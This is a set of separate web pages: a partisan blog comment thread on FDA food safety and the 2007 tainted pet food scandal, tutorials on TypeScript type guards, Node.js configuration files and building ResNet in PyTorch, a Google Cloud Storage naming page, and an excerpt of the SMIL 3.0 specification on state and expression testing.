RightEqualsStupid spews: Support our troops – take their place. RightEqualsStupid spews: Mission Accomplished! Richard Pope spews: Roger Rabbit @ 56 Is there a Republican side of Lake Washington anymore? Richard Pope spews: RightOn @ 57 Not that I can tell. Libertarian spews: Roger said, Roger Rabbit says: “…The only thing George Soros wants is honest and competent management of the government.” ======= The only thing George Soros wants is to have free rein to manipulate international currencies to benefit himself. He wants to be declared Supreme Being of the Universe. Fortunately, he won’t live forever. Right Stuff spews: Roger Rabbit says: 04/03/2007 at 10:02 pm Nice opinion statement that you quoted Rabbit. I would imagine that 90%+ of the folks at the FDA are career employees. Bottom line here. I know that you need and expect the govt to take care of you. Unfortunately no matter what party is in control of the govt, that isn’t going to happen (lest we become a Stalinist, communist state) It’s really fun to watch how you radicals tie the Bush admin to everything…. Let me help out. “Yet the federal regulators, WHO ARE PROBABLY ON A NO BID CONTRACT FROM HALIBURTON, charged with safeguarding our food supply, EXCEPT THAT THE CHENEY-RUMSFELD CABAL HAS MISDIRECTED THE COUNTRY FOR A WAR OF CHOICE AGAINST THAT POOR INNOCENT FREEDOM FIGHTER SADDAM HUSSEIN, seemed more concerned with protecting the interests of the corporations, LIKE HALIBURTON, EXXON, BIG OIL, WALMART, CEO’S AND LOBBYISTS, than in giving consumers the facts they needed to make informed decisions on their own, OF COURSE WHAT I MEAN BY INFORMED DECISION OF THEIR OWN IS WHAT MY PARTY IS TELLING ME TO THINK. COMMRADE” headless lucy spews: Lack of funding in the last 5 years? Hmmmmmn…… Must be Clinton’s fault! John Barelli spews: As Roger is probably still sleeping off a long night entertaining Mrs. Rabbit, I’ll take this. Government agencies tend to take their lead from the top.
Career civil servants either learn to follow that lead or they change employers. As far as the expectation of government “taking care of me”, you might be surprised that, as I have a certain libertarian leaning, I tend to agree with you more often than not. But some functions are such that individuals are not readily able to perform them, and are better dealt with in a collective, governmental arena. While I’m in favor of the Second Amendment, I’m not in favor of private armies. Police, fire protection, parks, schools, libraries are all legitimate government functions. As is testing food supplies. I cannot test for every possible contaminant, nor can I go down to the docks and test food stocks coming in from overseas. I must rely on the FDA for that function. Large corporate food suppliers have, for the most part, replaced the local farmers’ market. When I eat lunch, my hamburger contains Washington beef, which was fed using foreign feed, the tomato comes from Argentina, the lettuce from Mexico, the onion from Peru and the bun made with wheat gluten from China and sesame seeds from India. Large corporations with the ability (and sometimes the will) to conceal important information from me are providing every item in that hamburger. I must rely on the FDA and the government to police this, as it is beyond my ability. Tlazolteotl spews: Richard Pope. I agree with you that WalMart is evil, and I don’t shop there (plus, I don’t like having to navigate all the dumbed down fatasses that tend to shop there). On the other hand, your comments @30/31 are just silly. US companies contract with suppliers, and expect US regulators to add a little security regarding enforcement of laws re adulteration etc. It is the Grover Norquist vision of government that is failing, just as we saw during Katrina. 
Yes, they’ve cut funding for agencies until they can’t do their jobs effectively – now the free-marketeers can whine about how gov is ineffective, and promise that privatizing it would be better. This is a betrayal of good government principles, and it is sending us into a second robber-baron age. You may disagree, but I do not think this is a good thing. Tree Frog Farmer spews: JohnBarelli@67 The issue goes beyond your thesis. Anyone with a cursory acquaintanceship with The Jungle knows the pre-eminent role government can play in safeguarding public health and safety, particularly where the food chain is concerned. Unhappily, certain elements of our current administration want to roll many of our standards back to the turn of the century. Tree Frog Farmer spews: Hmm, showing my age here, that would be the turn of the previous century, i.e. 1900. calguy spews: In San Francisco now 2-3 weeks back there was a `bug’ going around among elementary school kids. My preschool aged son got it–symptoms were vomiting followed by lethargy, mild fever, diarrhea–what was weird about the bug is that my wife got full on exposure but did not get sick — she cleaned up most of the damage and the last time this happened with a bug in January she subsequently got sick. What is also weird is that my son seems to have lingering irritability. Usually most of our household gets sick with any given bug, but not this one. OK, note that the symptoms are much the same as the dogs and cats exposed to the tainted food, and that to a large degree this was not transmissible. The timing–March 15 +/- a few days, shortly after the wave of pet cases. My question to the Horse’s ass community is this–any similar `bugs’ out there among kids with similar evidence for a lack of transmissibility? The gluten could be in any number of products that kids eat (hot dog buns, fish sticks, wieners, hamburgers, cookies–). This is very hard to find looking around the internet.
While you can get local info from advice nurses on children’s health, they tend to write this off as a bug running around. Fair enough, but the epidemiology seems off to me. John Barelli spews: TreeFrogFarmer: Certainly the issue goes beyond my comments, which were simply written to debunk the idea that government is an inappropriate venue to deal with the issue. Back around 1900, most people had some idea of where their food came from. Much of it was grown in their back yard, or from local farmers. There was an automatic accountability. Sell food that makes folks sick, people stop buying from you, you go bankrupt, and someone else takes over your farm or store. Now it’s difficult to even figure out which major company is actually supplying the end product, much less figure out where the components are coming from. (For a while I made an effort to avoid Kraft products, as I disliked their parent company, Phillip Morris, and didn’t wish to support them with my purchases. Try doing that for just one shopping trip. You’ll be amazed how many things that one company supplies, and I’d be willing to bet that unless you shop exclusively at the Farmers Market or Trader Joe’s, you’ll miss something. If you routinely buy processed or packaged foods you will almost certainly buy something supplied, processed, packaged or distributed by Kraft. But I digress.) Most folks don’t have the resources to take on a multi-billion dollar corporation and force them to divulge where they’re getting the components for their products. Heck, even when the government is actively trying to police them, there are still problems. Since I’m unwilling to simply grow all my own food, I must rely on the government to police the suppliers, and with our current government’s “let’s just trust them” attitude, that is a very frightening reality. Steve spews: China is a CESSPOOL of pollution! Why in the FUCK are we getting food from there? And if so, why don’t labels say so??? 
Roger Rabbit spews: @62 Temporarily, but not for long. Within 18 months you’ll have a hard time finding a “red” county anywhere north of the M-D line. Roger Rabbit spews: @64 Isn’t that what capitalism is all about? Everybody grabbing as much as they can until one guy gets it all and is king of the hill? Roger Rabbit spews: @65 “Bottom line here. I know that you need and expect the govt to take care of you.” Isn’t that exactly what wingers like Reagan and Bush do when they pour trillions into defense? How much sense does it make to spend 10,000 times as much on guns as on food safety? And since when do “career employees” make policy decisions? Roger Rabbit spews: Would someone please recycle these ignorant wingnuts back to grade school for a basic education on how government works (or doesn’t). Roger Rabbit spews: Let’s not forget the criminally corrupt Bush administration wanted to fire all the federal meat inspectors and give taxpayer money to meat packing companies to hire their own inspectors. Does anyone really believe an inspector will fail any meat if the guy who can fire him works for the plant manager? Roger Rabbit spews: I hope you all took note of the fact that “Right Stuff” equates competent food inspection with “Stalinism” and “communism.” And these guys want us to let THEM run our government? Just remember in November whooooo wants to privatize (and bastardize) the safety of what you put in your body. Roger Rabbit spews: Of course, the GOP will never run on a platform of “no food inspection.” That’s their platform, but they know what would happen to them at the polls if voters knew what they really stand for. That’s why they have to lie about Democrats and create distractions. They don’t dare run on issues! Roger Rabbit spews: 69, 70 The very first government regulation on this continent was the weights and measures ordinances adopted by colonists almost immediately after they stepped off Plymouth Rock. 
The very first Republicans on this continent were the shopkeepers who tried to cheat their colonist customers. Roger Rabbit spews: @73 We aren’t getting food from China. We’re shipping our own food (wheat) to China for processing, then shipping it back, so we don’t create jobs for American labor. Another reason is because we more cheap oil than we know what to do with and it’s necessary to burn it up in ships transporting wheat back and forth so we don’t drown in surplus oil. Or, alternatively, you could look at this as another fucking failure of free-market economics. Roger Rabbit spews: … we have more cheap oil … Roger Rabbit spews: But don’t worry, Redneck’s “invisible hand” will keep finding more oil forever, when it’s not busy with domestic chores under his raincoat (snicker). Roger Rabbit spews: As Redneck knows, free-market economics puts more oil in the ground every day. ArtFart spews: For the benefit of those of you who just fell off the turnip truck or suffer from early-onset dementia, the groundwork for our present relationship with the People’s Republic of China was laid by Richard Milhous Nixon. Right Stuff spews: @79 Not exactly. More to the point I equate your political beliefs with those of Stalin and Communism. Not food inspection. As I stated, your radical view, in which you tie all things bad to the Bush admin, is what I find amusing. I’m not well enough versed in the workings of the FDA to opine on whether or not food inspection should be privatized. I am damn sure you’re not. What I want to know, and will be watching, is what steps are taken to take care of the true problem here, which is China. Public safety is certainly one of the functions I believe our govt is responsible for. ArtFart spews: Eric Schlosser, in “Fast Food Nation” describes how the FDA and USDA under Reagan failed to do anything substantial when the e. coli outbreak at the Aurora Jack-In-The-Box led to the revelation that we were being sold meat laced with shit.
It turned out McDonald’s, as the beef industry’s single largest customer, did more than any other entity to force the packing houses to clean up their act. Seems they had some understanding that they wouldn’t get much repeat business if their customers died. ArtFart spews: I’m especially disturbed by all the frantic “assurances” we’re being given that none of the tainted wheat gluten is getting into the human food supply. How difficult would it be for there to be some confusion over which cans were getting labeled “Morsels and Gravy” and which were getting labeled “Dinty Moore”? Right Stuff spews: @67 Mr. B “Government agencies tend to take their lead from the top. Career civil servants either learn to follow that lead or they change employers.” Yes and no. I agree that the agency receives direction and steering from the top, however, my point is that most bureaucrats tend to stay in positions despite personal political beliefs because the job and benefits outweigh their political loyalties. The vast majority of federal agencies don’t roll over their employee base every 4-8 years… ArtFart spews: Let’s take it one step further…how cavalier is the food industry being about what products it puts wheat gluten into and how they’re labeled? Wheat gluten allergy isn’t at all uncommon. Right Stuff spews: “McDonald’s, as the beef industry’s single largest customer, did more than any other entity to force the packing houses to clean up their act. Seems they had some understanding that they wouldn’t get much repeat business if their customers died” Be careful of whose point you’re making here! headless lucy spews: re 92: McDonald’s encourages the destruction of the Amazon rain forest. There’s a very good reason those burgers only cost .99 cents. Clancy J. spews: You’re a fool if you trust any government agency with anything anymore…under the Bushies’ plan to seed America with good ‘n loyal ciphers, no agency is worth a crap.
The people running government agencies in 2007 are wholly incompetent; they’re not chosen for their jobs based on any kind of expertise in a given field. It’s a raise of the hand, a swearing of fealty to Bush/Rove/Republican domination, and no oversight whatsoever. Our lives are expendable to them, our democracy is a plaything, and their despotic ideology is a lice contagion. Eat organic if you can, eat from your garden, etc. Don’t believe a damn thing they say – in fact, play the inverse-proportionalities game: if they say A, B is the case, and if they come down hard on C, embrace D for its succor. They’re criminals after two things: wealth and power. They’re getting those things. Consumers and troops are just what those words imply, and sure aren’t living, breathing people. Pay attention. Davol spews: Our food has been going this way since Monsanto started importing my tomatoes from New Jersey. We need to rethink how we provide food for ourselves in a way which is more locally provided, and provides less corporate pocket lining from the corporatising of our food. This is only one way the corporatising of our food is killing us and making our country less safe. The buy-Organic movement is off the ground and may soon be the favored alternative to MEGA-GeneticallyEngineered-uninformatively-labeled-Food. Especially if a couple more fiascoes like this pet killing food scandal keep occurring. Currently the trend looks like it will get worse before we make it better. Karl H. Weiss spews: Does anyone out there have any idea how many poor old people are sick or dying from eating cat or dog food?
http://horsesass.org/does-fda-spell-fema/
User Defined Type Guards mean that the user can declare a particular Type Guard, or you can help TypeScript to infer a type when you use, for example, a function. We will demonstrate this with the following code:

```typescript
class Song {
  constructor(public title: string, public duration: number) {}
}

class Playlist {
  constructor(public name: string, public songs: Song[]) {}
}

function getItemName(item: Song | Playlist) {
  if (item instanceof Song) {
    return item.title;
  }
  return item.name;
}

const songName = getItemName(new Song('Wonderful Wonderful', 300000));
console.log('Song name:', songName);

const playlistName = getItemName(
  new Playlist('The Best Songs', [new Song('The Man', 300000)])
);
console.log('Playlist name:', playlistName);
```

The instanceof and typeof operators aren’t always the best tool to use. In a scenario where you may want to break a check down into a reusable function, we lose the type inference if the check is no longer written inline as `item instanceof Song`, because TypeScript cannot infer the type further down. There is a way around this. What we are going to do is create a function, isSong, that says whether the item is a Song. If it is a Song, return the title, otherwise return the name.

```typescript
function getItemName(item: Song | Playlist) {
  if (isSong(item)) {
    return item.title;
  }
  return item.name;
}
```

If we were to do this we would be getting some errors from TypeScript. One red underline would be under title and the other under name. Let’s go and create the function isSong. We will pass the argument item of type any. We are not going to change the behaviour, but we are going to check whether the item is an instanceof Song.

```typescript
function isSong(item: any) {
  return item instanceof Song;
}
```

This code would completely work at runtime; however, at compile time all TypeScript knows about isSong is that it returns a boolean, which is the inferred return type, because instanceof will return true or false. We don’t get any type information from it. Instead of doing something like this:

```typescript
function getItemName(item: Song | Playlist) {
  if (isSong(item)) {
    return (item as Song).title;
  }
  return item.name;
}
```

we want to let our Union type in the function argument instruct TypeScript of what we are dealing with. This is the crucial part for understanding a user defined type guard. So in our isSong function we can provide extra information: we can say that item is a Song. That way, when this function evaluates to true, we are manually returning type information that says: if this function successfully returns true, then what we are dealing with is a Song.

```typescript
function isSong(item: any): item is Song {
  return item instanceof Song;
}
```

This is what we call a User Defined Type Guard. You can create any kind of type and any kind of check, but it’s up to you to make sure that item instanceof Song, in this case, returns a boolean. If we were to return an object instead we would see an error, because we can only use the is syntax when the function returns a boolean. You will see the is syntax whenever something returns a boolean but supplies further type information, which we can then use.

So this is a User Defined Type Guard. You can use them with your own custom types (like we just saw with Song), and if in your application you want to say something is going to be a string array, you can do exactly that. You have complete flexibility over what types you want to tell TypeScript are coming back.
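As a minimal sketch of that last point — guarding a plain string array rather than a custom class (the function names here are our own, not from the article):

```typescript
// A user defined type guard for string arrays: the "value is string[]"
// return type tells TypeScript what the value is when this returns true.
function isStringArray(value: unknown): value is string[] {
  return Array.isArray(value) && value.every((v) => typeof v === 'string');
}

function joinNames(value: unknown): string {
  if (isStringArray(value)) {
    // Inside this branch, TypeScript has narrowed value to string[]
    return value.join(', ');
  }
  return 'not a string array';
}

console.log(joinNames(['Wonderful Wonderful', 'The Man'])); // Wonderful Wonderful, The Man
console.log(joinNames(42)); // not a string array
```

The same rule applies: the guard must return a boolean, and the `is` annotation supplies the extra type information that a bare boolean cannot.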
https://ultimatecourses.com/blog/user-defined-type-guards-in-typescript
This page outlines the naming guidelines you should follow when creating buckets and uploading objects in Cloud Storage. To learn how to create a bucket, see the Creating storage buckets guide.

Bucket name requirements

Your bucket names must meet the following requirements:

- A period cannot be adjacent to another period or dash. For example, ".." or "-." or ".-" are not valid in DNS names.

Bucket name considerations

Bucket names reside in a single Cloud Storage namespace. This means that:

- Every bucket name must be unique.
- Bucket names are publicly visible.

If you try to create a bucket with a name that already belongs to an existing bucket, Cloud Storage responds with an error message. However, once you delete a bucket, you or another user can reuse its name for a new bucket.

See also the Naming Best Practices section, which includes recommendations about excluding proprietary information from bucket and object names.

As with buckets, existing objects cannot be directly renamed. Instead, you can copy an object, give the copied version the desired name, and delete the original version of the object. See Renaming an object for a step-by-step guide, which includes instructions for tools like gsutil and the Google Cloud Platform Console, which handle the renaming process automatically.
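As a rough illustration of the adjacency rule above, here is a small check one could run before attempting a bucket creation. This validator is our own sketch: it covers only the period/dash adjacency rule quoted here, not the full set of Cloud Storage bucket name requirements.

```typescript
// Sketch: reject names where a period sits next to another period or a dash.
// Covers only the adjacency rule discussed above, not all naming rules.
function violatesAdjacencyRule(name: string): boolean {
  return /\.\.|\.-|-\./.test(name);
}

console.log(violatesAdjacencyRule('my..bucket'));        // true  ("..")
console.log(violatesAdjacencyRule('my.-bucket'));        // true  (".-")
console.log(violatesAdjacencyRule('my-bucket.example')); // false
```

A check like this only saves a round trip; Cloud Storage itself still enforces the real rules and returns an error for an invalid name.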
https://cloud.google.com/storage/docs/naming?hl=th
Node.js Application Configuration Files

December 13, 2010 - 9 Comments

What is the best practice for making a configuration file for your Node.js application? Writing a property file parser or passing parameters at the command line is cumbersome.

Eval

One easy way to separate configuration and application code is by using the eval statement. Define your configuration as a simple Javascript associative array and load and evaluate it on app startup. Example configuration file myconfig.js:

```javascript
settings = {
  a: 10, // this is used for something
  SOME_FILE: "/tmp/something"
}
```

Then at the start of your application:

```javascript
var fs = require('fs');
eval(fs.readFileSync('myconfig.js', encoding="ascii"));
```

Now the settings object can be used as your program settings, e.g.:

```javascript
var mydata = fs.readFileSync(settings.SOME_FILE);
for( i = 0 ; i < settings.a ; i++) {
  // do something
}
```

Require

Another alternative to load configuration, as stated in comments, is to define configuration as a module file and require it.

```javascript
//-- configuration.js
module.exports = {
  a: 10,
  SOME_FILE: '/tmp/foo'
}
```

In application code, then require the file:

```javascript
var settings = require('./configuration');
```

This prevents other global variables creeping into the global scope, but it’s hackier to do dynamic configuration reloading. If you detect that the file has changed and want to reload it at runtime, you must delete the entry from the require cache and re-require the file. Another minor complication is that require uses its own search path (that you can override with the NODE_PATH env. variable), so it’s more work to define a dynamic location for the configuration file in your app (e.g. set it from the command line).

```javascript
// to reload file with require
var path = require('path');
var filename = path.resolve('./configuration.js');
delete require.cache[filename];
var tools = require('./configuration');
```

Plain javascript as a configuration file has the benefit (and downside) that it’s possible to run any javascript in the settings. For example:
settings = { started: new Date(), nonce: ~~(1E6 * Math.random()), a: 10, SOME_FILE: "/tmp/something" } Both of these methods are mostly matter of taste. Eval is bit riskier as it allows leaking variables to global namespace but you’ll never have anything “stupid” in the configuration files anyway. Right? JSON file I’m not fan of using JSON as configuration format as it’s cumbersome to write and most editors are not able to show syntax errors in it. JSON also does not support comments that can be a big problem in more complicated configuration files. Example configuration file myconfig.json { "a":10, "SOME_FILE":"/tmp/something" } Then at start of your application read json file and parse it to object. var fs = require('fs'); var settings = JSON.parse(fs.readFileSync('myconfig.json', encoding="ascii")); And then use settings as usual var mydata = fs.readFileSync(settings.SOME_FILE); for( i = 0 ; i < settings.a ; i++) { // do something } Merging configuration files One way to simplify significantly configuration management is to do hierarchical configuration. For example have single base configuration file and then define overrides for developer, testing and production use. For this we need merge function. // merges o2 properties to o1 var merge = exports.merge = function(o1, o2) { for (var prop in o2) { var val = o2[prop]; if (o1.hasOwnProperty(prop)) { if (typeof val == 'object') { if (val && val.constructor != Array) { // not array val = merge(o1[prop], val); } } } o1[prop] = val; // copy and override } return o1; } You can use merge to combine configurations. For example, lets have these two configuration objects. // base configuration from baseconf.js var baseconfig = { a: "someval", env: { name "base", code: 1 } } // test config from localconf.js var localconfig = { env: { name "test" db: 'localhost' }, test: true } Now it’s possible to merge these easily var settings = merge( baseconfig, localconfig ); console.log( settings. 
a ); // prints 'someval' console.log( settings.env.name ); // prints 'test' console.log( settings.env.code ); // prints '1' console.log( settings.env.db ); // prints 'localhost' console.log( settings.env.test ); // prints 'true' Thanks, this really helped me! Pingback: CodeBudo » Blog Archive » Application Configuration for Node.js There is a small typo in your post, the code to read a file and eval should be: eval(fs.readFileSync(‘myconfig.js’, encoding=”ascii”)); Thanks! Fixed. Why not just store your settings as a module? Then you can utilize require() to keep a single reference to it. appSettings.js: exports.settings = { settingName: ‘this is cool!’ , settingName2: true } Usage: var settings = require(‘./appSettings.js’).settings; console.log(settings.settingName); require() is good way to load settings, however I wanted to keep settings strictly as separate from the modules. Matter of taste methinks. Why on earth would you use eval? eval is evil. Use JSON instead, or with comments it’s cjson: With a dead simple .properties file: Nice article, thanks for sharing… one small addition… for your json file, you don’t have to use filesystem to load it. var settings = require(‘myconfig.json’); loads the json file as a json object in the settings variable (pretty much the same as your code did, but in one line).
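For comparison, the deep-merge logic above is not Node-specific. Here is the same algorithm sketched in Python (my own translation, not from the post): nested dicts are merged recursively, and everything else, including lists, is copied over so that the override wins.

```python
def merge(o1, o2):
    """Merge o2's properties into o1. Nested dicts are merged recursively;
    any other value (including lists) overrides the one in o1."""
    for prop, val in o2.items():
        if prop in o1 and isinstance(val, dict) and isinstance(o1[prop], dict):
            val = merge(o1[prop], val)
        o1[prop] = val
    return o1

# The same base/local example as in the post
baseconfig = {"a": "someval", "env": {"name": "base", "code": 1}}
localconfig = {"env": {"name": "test", "db": "localhost"}, "test": True}

settings = merge(baseconfig, localconfig)
print(settings["a"])            # someval
print(settings["env"]["name"])  # test
print(settings["env"]["code"])  # 1
print(settings["env"]["db"])    # localhost
print(settings["test"])         # True
```

The recursion bottoms out at non-dict values, which is the same design choice the JavaScript version makes: overrides replace scalars and arrays wholesale rather than trying to merge them.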
https://bravenewmethod.com/2010/12/13/node-js-application-configuration-files/
Introduction

There have been a series of breakthroughs in the fields of deep learning and computer vision. In particular, the introduction of very deep convolutional neural networks helped achieve state-of-the-art results on problems such as image recognition and image classification. Over the years, deep learning architectures became deeper and deeper (adding more layers) to solve ever more complex tasks, which also improved the performance of classification and recognition tasks and made them more robust. But as more layers are added to a neural network, it becomes much more difficult to train, and the accuracy of the model starts to saturate and then degrades. ResNet was introduced to rescue us from that scenario and helps resolve this problem.

What is ResNet?

Residual Network (ResNet) is one of the best-known deep learning models, introduced by Kaiming He, Xiangyu Zhang, Shaoqing Ren and Jian Sun in their 2015 paper "Deep Residual Learning for Image Recognition" [1]. The ResNet model is one of the most popular and successful deep learning models so far.

Residual Blocks

The problem of training very deep networks has been relieved by the introduction of residual blocks, and the ResNet model is made up of these blocks. In the figure above, the first thing to notice is the direct connection that skips some layers of the model. This connection is called a "skip connection" and is the heart of residual blocks. The output is not the same due to this skip connection. Without the skip connection, the input x gets multiplied by the weights of the layer, followed by adding a bias term; then comes the activation function f(), and we get the output H(x):

H(x) = f(wx + b), or simply H(x) = f(x)

With the introduction of the skip connection technique, the output changes to

H(x) = f(x) + x

But the dimension of the input may differ from that of the output, which can happen with convolutional or pooling layers. This problem can be handled with two approaches:

- Zero-padding the skip connection to increase its dimensions.
- Adding 1×1 convolutional layers to the input to match the dimensions. In this case the output is H(x) = f(x) + w1·x, where w1 is an additional parameter (no additional parameter is needed with the first approach).

These skip connections in ResNet solve the problem of vanishing gradients in deep CNNs by allowing an alternate shortcut path for the gradient to flow through. The skip connection also helps in that, if any layer hurts the performance of the architecture, it can be skipped by regularization.

Architecture of ResNet

The architecture starts from a 34-layer plain network, inspired by VGG-19, to which the shortcut connections (skip connections) are added. These skip connections, or residual blocks, convert the architecture into a residual network, as shown in the figure below.

Source: "Deep Residual Learning for Image Recognition" paper

Using ResNet with Keras

Keras is an open-source deep-learning library capable of running on top of TensorFlow. Keras Applications provides the following ResNet versions:

- ResNet50
- ResNet50V2
- ResNet101
- ResNet101V2
- ResNet152
- ResNet152V2

Let's build ResNet from scratch

Source: "Deep Residual Learning for Image Recognition" paper

Let us keep the above image as a reference and start building the network. The ResNet architecture uses its CNN block multiple times, so let us create a class for the CNN block, which takes input channels and output channels. There is a BatchNorm2d after each conv layer.
    import torch
    import torch.nn as nn

    class block(nn.Module):
        def __init__(
            self, in_channels, intermediate_channels, identity_downsample=None, stride=1
        ):
            super(block, self).__init__()
            self.expansion = 4
            self.conv1 = nn.Conv2d(
                in_channels, intermediate_channels,
                kernel_size=1, stride=1, padding=0, bias=False
            )
            self.bn1 = nn.BatchNorm2d(intermediate_channels)
            self.conv2 = nn.Conv2d(
                intermediate_channels, intermediate_channels,
                kernel_size=3, stride=stride, padding=1, bias=False
            )
            self.bn2 = nn.BatchNorm2d(intermediate_channels)
            self.conv3 = nn.Conv2d(
                intermediate_channels, intermediate_channels * self.expansion,
                kernel_size=1, stride=1, padding=0, bias=False
            )
            self.bn3 = nn.BatchNorm2d(intermediate_channels * self.expansion)
            self.relu = nn.ReLU()
            self.identity_downsample = identity_downsample
            self.stride = stride

        def forward(self, x):
            identity = x.clone()
            x = self.conv1(x)
            x = self.bn1(x)
            x = self.relu(x)
            x = self.conv2(x)
            x = self.bn2(x)
            x = self.relu(x)
            x = self.conv3(x)
            x = self.bn3(x)
            if self.identity_downsample is not None:
                identity = self.identity_downsample(identity)
            x += identity
            x = self.relu(x)
            return x

Then create a ResNet class that takes as input the block, the number of blocks per layer, the image channels, and the number of classes. In the code below, the function `_make_layer` creates the ResNet layers; it takes the block, the number of residual blocks, the intermediate channel count, and the stride.

    class ResNet(nn.Module):
        def __init__(self, block, layers, image_channels, num_classes):
            super(ResNet, self).__init__()
            self.in_channels = 64
            self.conv1 = nn.Conv2d(image_channels, 64, kernel_size=7, stride=2, padding=3, bias=False)
            self.bn1 = nn.BatchNorm2d(64)
            self.relu = nn.ReLU()
            self.maxpool = nn.MaxPool2d(kernel_size=3, stride=2, padding=1)

            # Essentially the entire ResNet architecture is in these 4 lines below
            self.layer1 = self._make_layer(block, layers[0], intermediate_channels=64, stride=1)
            self.layer2 = self._make_layer(block, layers[1], intermediate_channels=128, stride=2)
            self.layer3 = self._make_layer(block, layers[2], intermediate_channels=256, stride=2)
            self.layer4 = self._make_layer(block, layers[3], intermediate_channels=512, stride=2)

            self.avgpool = nn.AdaptiveAvgPool2d((1, 1))
            self.fc = nn.Linear(512 * 4, num_classes)

        def forward(self, x):
            x = self.conv1(x)
            x = self.bn1(x)
            x = self.relu(x)
            x = self.maxpool(x)
            x = self.layer1(x)
            x = self.layer2(x)
            x = self.layer3(x)
            x = self.layer4(x)
            x = self.avgpool(x)
            x = x.reshape(x.shape[0], -1)
            x = self.fc(x)
            return x

        def _make_layer(self, block, num_residual_blocks, intermediate_channels, stride):
            identity_downsample = None
            layers = []

            # If we halve the input space (e.g. 56x56 -> 28x28, stride=2), or the number
            # of channels changes, we need to adapt the identity (skip connection) so it
            # can be added to the layer that's ahead
            if stride != 1 or self.in_channels != intermediate_channels * 4:
                identity_downsample = nn.Sequential(
                    nn.Conv2d(
                        self.in_channels, intermediate_channels * 4,
                        kernel_size=1, stride=stride, bias=False
                    ),
                    nn.BatchNorm2d(intermediate_channels * 4),
                )

            layers.append(
                block(self.in_channels, intermediate_channels, identity_downsample, stride)
            )

            # The expansion size is always 4 for ResNet 50, 101, 152
            self.in_channels = intermediate_channels * 4

            # For example, in the first ResNet layer 256 channels are mapped to 64 in the
            # intermediate layers, then finally back to 256. Hence no identity downsample
            # is needed, since stride = 1 and the channel counts match.
            for i in range(num_residual_blocks - 1):
                layers.append(block(self.in_channels, intermediate_channels))

            return nn.Sequential(*layers)

Then define the different versions of ResNet:

- For ResNet50 the layer sequence is [3, 4, 6, 3].
- For ResNet101 the layer sequence is [3, 4, 23, 3].
- For ResNet152 the layer sequence is [3, 8, 36, 3].

(Refer to the "Deep Residual Learning for Image Recognition" paper.)

    def ResNet50(img_channel=3, num_classes=1000):
        return ResNet(block, [3, 4, 6, 3], img_channel, num_classes)

    def ResNet101(img_channel=3, num_classes=1000):
        return ResNet(block, [3, 4, 23, 3], img_channel, num_classes)

    def ResNet152(img_channel=3, num_classes=1000):
        return ResNet(block, [3, 8, 36, 3], img_channel, num_classes)

Then write a small test to check whether the model is working fine:

    def test():
        net = ResNet101(img_channel=3, num_classes=1000)
        device = "cuda" if torch.cuda.is_available() else "cpu"
        y = net(torch.randn(4, 3, 224, 224)).to(device)
        print(y.size())

    test()

For the above test case the output should be torch.Size([4, 1000]).

The entire code can be accessed here:

[1]. Kaiming He, Xiangyu Zhang, Shaoqing Ren, Jian Sun: Deep Residual Learning for Image Recognition, Dec 2015. DOI:

Thank you. Your suggestions and doubts are welcome in the comment section.

Thank you for reading my article! You can also read this article on our Mobile APP.
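As a quick sanity check on the layer sequences above, the networks' names can be recovered arithmetically: each bottleneck block contributes 3 convolutions, plus the initial 7×7 convolution and the final fully connected layer. (This counting convention is the usual one for the paper's naming; the snippet is my own illustration, not from the article.)

```python
def resnet_depth(layers):
    """Depth of a bottleneck ResNet: 3 convs per block, plus conv1 and the fc layer."""
    return 3 * sum(layers) + 2

print(resnet_depth([3, 4, 6, 3]))   # 50  -> ResNet50
print(resnet_depth([3, 4, 23, 3]))  # 101 -> ResNet101
print(resnet_depth([3, 8, 36, 3]))  # 152 -> ResNet152
```

This is also a handy way to double-check a custom layer sequence before training it.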
https://www.analyticsvidhya.com/blog/2021/06/build-resnet-from-scratch-with-python/
This section is informative. The modules defined in this chapter are all new modules which were not part of the SMIL 2.1 specification.

This section is informative. A SMIL 2.1 presentation has a lot of state that influences how the presentation runs. Or, to rephrase that in a procedural way, state that influences decisions that the SMIL scheduler makes. All this state is either implicit in the presentation (which nodes are active and how long into their duration they are, how many iterations of a repeat have been done, which nodes in an excl are paused because a higher-priority node has preempted them, etc.), or completely external to the presentation (system tests and custom tests). The effect is that the only control flow the SMIL author has at his/her disposal is that which is built into the language, unless the SMIL engine includes a scripting-language component and a DOM interface to the document that the author can use to create more complex logic. The modules in this section provide a mechanism whereby the document author can create more complex control flow. In addition, the mechanisms that the SMIL BasicContentControl and CustomTestAttributes modules provide for testing values are limited: basically one can only test for predefined conditions being true (not for them being false), and there is a limited form of testing for multiple conditions, with "and" being the only boolean operator. Application areas include things like quizzes, interactive adaptation of presentations to user preferences, computer-aided instruction and distance learning.

This section is informative. The design of these modules was done after meeting with the W3C Backplane Group (part of the Hypertext Coordination Group), and various choices were influenced by the direction that group is taking. These modules therefore borrow heavily from work done by other W3C working groups.

This section is normative. This chapter defines the following modules:

This section is informative.
The SMIL 3.0 StateTest Module defined in this document is a new module which was not part of the SMIL 2.1 specification.

This section is informative. The mechanisms that the BasicContentControl and CustomTestAttributes modules provide for testing values are limited: basically one can only test for predefined conditions being true (not for them being false), and by specifying multiple system test attributes an author has a way to simulate an "and" operator, but that is all. This module introduces a generalized expr attribute that contains an expression. If the expression evaluates to false, the element carrying the attribute is ignored. If the expression evaluates to true, or if there is any error (this ranges from expression syntax errors and type errors to unavailability of the expression-language engine), the element is treated normally.

This section is normative.

This section is informative. The SMIL 3.0 Language Profile specifies that XPath 1.0 is used as the expression language; it can therefore be used for more dynamic control, whereas there is no such guarantee for other expression languages.

This section is normative. This module defines a set of functions for use in the expr attribute (possibly in addition to functions already defined in the expression language). The naming convention used for the functions is compatible with XPath 1.0 expressions; a profile using this module with another expression language must specify a transformation to be applied to these function names to make them compatible with the expression language specified.

This section is informative. Here is a SMIL 3.0 Language Profile example of an audio element that is only played if audio descriptions are off and the internet connection is faster than 1 Mbps.
Think of using it for playing background music only when this will not interfere too much with the real presentation:

    <audio src="background.mp3"
           expr="not(smil-audioDesc()) and smil-bitrate() > 1000000" />

This section is informative. The UserState module defines a data model that expressions can refer to in the context of the expr attribute, allowing elements to be rendered depending on author-defined values. A mechanism to change values in the data model is also included. The actual choice of the expression language is made in the language profile. The SMIL 3.0 Language Profile requires support for the XPath 1.0 expression language (but allows use of other languages as well).

This section is normative. The UserState module defines the elements state, setvalue, newvalue and delvalue and the attributes language, ref, where, name and value.

The state element sets global, document-wide information for the other elements and attributes in this module. It selects the expression language to use, and it may also be used to initialize the data model. Initialization of the data model may be done inline, through the contents of the state element, or from an external source through the src attribute (defined in the Media Object Modules section). The state element accepts the language and src attributes.

